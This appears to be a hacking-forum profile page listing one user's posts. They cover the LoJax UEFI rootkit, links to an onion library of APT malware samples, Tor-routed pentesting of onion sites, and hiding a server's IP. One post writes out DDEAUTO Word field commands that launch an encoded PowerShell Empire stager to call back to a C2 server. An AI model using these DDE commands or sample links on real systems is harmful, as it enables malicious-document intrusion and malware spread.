Перейти к содержанию


  • Публикаций

  • Зарегистрирован

  • Посещение


0 Neutral

Информация о CorruptedKernel

  • Звание
    Rank №1
  1. FancyBear LoJax UEFI Malware!

    Hey guys, Just saw this article https://www.welivesecurity.com/wp-content/u.../ESET-LoJax.pdf Even though we have seen UEFI Rootkits/Bootkits already during conference talks and etc, now it's being used in the wild for modern Malware. After hearing about this kind of attack in the Bios's and UEFI a couple of years ago, I feel like this is going to be the new versions soon of "Cyber weapons" due to getting persistence so far into systems, where even wiping the hard drive doesn't help you. Just thought it was some cool news, and what the Bears are up too. Glad to make the thread a Rootkit/Bootkit thread though! Привет, ребята., Только что видел эту статью https://www.welivesecurity.com/wp-content/u.../ESET-LoJax.pdf Несмотря на то, что мы уже видели UEFI руткиты / Буткиты во время конференций и т. д., Теперь он используется в дикой природе для современных. Услышав об этой атаке в Bios и UEFI пару лет назад, я чувствую, что это будет новейшая версия "кибер-оружия". ничем тебе не помогает. Просто подумал, что это крутые новости, и что задумали медведи. Рад сделать поток руткит / буткит поток, хотя! CorruptedKernel
  2. Looking for malware samples?

    Most of them are current. I like to usually update the library whenever there some good APT samples going on. As I am busy atm I try to upload some of the bigger APT Malware when it does come available. Thanks.
  3. Looking for malware samples?

    New link to access via clearnet: hxxp://iec56w4ibovnb4wc.onion.moda
  4. Looking for malware samples?

    Привет I have found a great place to get free malware samples to download and reverse and learn from it. The person collects APT/Advanced variant malware, all organized and everything.. Check it out! Security researcher's twitter: hxxps://www.twitter.com/0xffff0800 Malware sample library: hxxp://iec56w4ibovnb4wc.onion.si (Without Tor Browser) hxxp://iec56w4ibovnb4wc.onion (Without Tor Browser) Image to verify: hxxps://imgur.com/a/Qbbl82o Enjoy!
  5. Hey guys, I've been tasked to do a exercise with Empire (https://github.com/EmpireProject/Empire) and to run a DDE exploit in Word 2010, to call back to the Empire C2 server. I have already used the macroless stager that empire has built in, and the metasploit version of the DDE exploit.. But this not what I'm suppose to do. But my task is to Import the Powershell script generated from the Empire launcher command (https://pastebin.com/hsGYj4Px) <---- Generated Powershell script! and import that PowerShell script into the Word document, so when its clicked it will connect back to my Empire C2. I am running these on a virtual machine, which are both connected to my INTERNAL network, so there is no IP problems. Target machine is Win7 x64 VM, and Attacking machine is Kali linux VM. My Full command's from when starting Empire: - Start Empire, and start my http listener ( execute - Next I use the command "launcher powershell http" <--- http is my listener to attach the stager to ** - PowerShell Script is generated and copy'd (https://pastebin.com/hsGYj4Px) <--- Generated Base64 PowerShell Script. - Next on my first attempt I opened up Office 2010, insert Formula etc and paste command code. {DDEAUTO c:\\Windows\\System32\\cmd.exe "\k powershell .exe -noP -sta -w 1 -enc (Big Base64 encoded script)"} ** Also tried without the "-noP -sta -w 1 -enc" before the encoded part of the script** - Got the message pop ups in Word, but no call back to the C2 in Empire.. - I also tried calling PowerShell directly from System32 {DDEAUTO c:\\Windows\\System32\WindowsPowerShell\v1.0\powershell.exe "(Big Base64 encoded script)"} Same messages pop-up but no call to C2. Can anyone help me figure out the exact DDEAUTO command I need to use to get this PowerShell Script to correctly exploit properly, Been smashing my head against the wall all day.
  6. Pentesting Onion Services?

    English Translation: Hey guys, I was wondering on how I can do pen-testing of onion services? How can I use programs on Kali linux (Burp-suite, OWASP, metasploit) and other open source tools to pen-test onion websites and make it go through the Tor Network? I've used Onionscan and programs like that, and ran Tor in my terminal to contact onion sites and etc, but How can I use other programs to interact with onion sites? I'm guessing I have to make some kind of socket to REDIRECT the programs to interact with the Tor Network.. Anyone have any ideas how I can get this to work? Russian Translation(Sorry if not 100%): Эй, ребята, мне было интересно, как я могу сделать проверку пера луковых услуг? Как я могу использовать программы на Kali linux (Burp-suite, OWASP, metasploit) и другие инструменты с открытым исходным кодом для сайтов pentest onion и сделать его пройти через сеть Tor? Я использовал Onions can и подобные программы, и запустил Tor в своем терминале, чтобы связаться с onion сайтами и т. д., но как я могу использовать другие программы для взаимодействия с onion сайтами? Я предполагаю, что я должен сделать какой-то сокет, чтобы перенаправить программы для взаимодействия с сетью Tor.. У кого-нибудь есть идеи, как я могу заставить это работать? Thanks corruptedkernel
  7. Nginx Reverse Proxy Apache Ubuntu Setup?

    English: Hey guys, I am looking into the way reverse proxy's work for hosting a webserver, so it's harder to find the real IP of that web server. I was talking to some people and they recommended me a article on the web via: https://www.digitalocean.com/community/tuto...tu-18-04-server Now my question is, Can I do this within a virtual network using VMWARE, or Virtualbox before using it in real world domains? I want to test out this tutorial but use it only in a LAN infrastructure ( and set up the reverse proxy. Also do I need to run 2 VM's one for Nginx, and one for Ubuntu?? If anyone could help me out with this/setup, that would be great. You can also add me on Jabber, and would love to talk more, and better communication. - corruptedkernel@exploit.im Thanks! Russian: Эй, ребята, я изучаю работу обратного прокси-сервера для хостинга веб-сервера, поэтому сложнее найти реальный IP-адрес этого веб-сервера. Я разговаривал с некоторыми людьми, и они рекомендовали мне статью в интернете через: https://www.digitalocean.com/community/tuto...tu-18-04-server Теперь мой вопрос: Могу ли я сделать это в виртуальной сети, используя VMWARE или Virtualbox, прежде чем использовать его в реальных доменах? Я хочу протестировать этот учебник, но использовать его только в инфраструктуре LAN ( и настроить обратный прокси-сервер. Также мне нужно запустить 2 VM для Nginx и один для Ubuntu?? Если кто-нибудь может помочь мне с этим/настройкой, это было бы здорово. Вы также можете добавить меня на Jabber и хотели бы поговорить больше и лучше общаться. - corruptedkernel@exploit.im Спасибо! :D